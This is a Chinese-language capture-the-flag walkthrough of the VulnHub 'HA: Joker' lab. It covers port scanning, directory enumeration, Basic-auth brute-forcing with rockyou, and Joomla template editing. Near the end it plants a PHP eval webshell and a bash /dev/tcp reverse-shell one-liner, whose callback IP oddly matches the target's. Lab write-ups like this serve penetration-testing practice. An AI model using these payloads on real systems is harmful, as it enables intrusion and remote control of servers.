靶场下载链接
https://download.vulnhub.com/ha/joker.zip
将kali和joker,桥接模式
获取靶场ip
arp-scan -l
使用nmap扫描
nmap -sS -sV -p-
访问80端口什么都没有发现
访问8080端口发现
用drib进行目录扫描
dirb "http://192.168.117.157" -X .txt,php,json,html
访问secret.txt发现
登录
使用登录,进行抓包
Authorization:后面的是账号密码的base64形式
发送到攻击器
打开kali自带字典,复制字典一部分,整个复制了最好
爆破时会用到
cd /usr/share/wordlists
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
cat rockyou.txt
新建一个a.txt将字典复制的放入
爆破设置
2的时候从文件加载选择a.txt
点击攻击后得到密码
解码base64
成功登录
账号密码弱口令登录,尝试用joomla
点击Site Administrator
因为刚才的弱口令登录成功,所以这个的账号密码都是joomla
进去后点击Templates
木马
选择一个文件编辑
创建一个新文件编辑,写入一句话木马
点击左上角保存
<?php @eval($_POST["cmd"]);?>
蚁剑连接成功
反弹shell
再建立一个a.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.117.157/6666 0>&1'");?>
使用kali开启对6666端口的监听
访问http://192.168.117.157:8080/templates/beez3/html/a.php
kali收到监听消息,反弹shell结束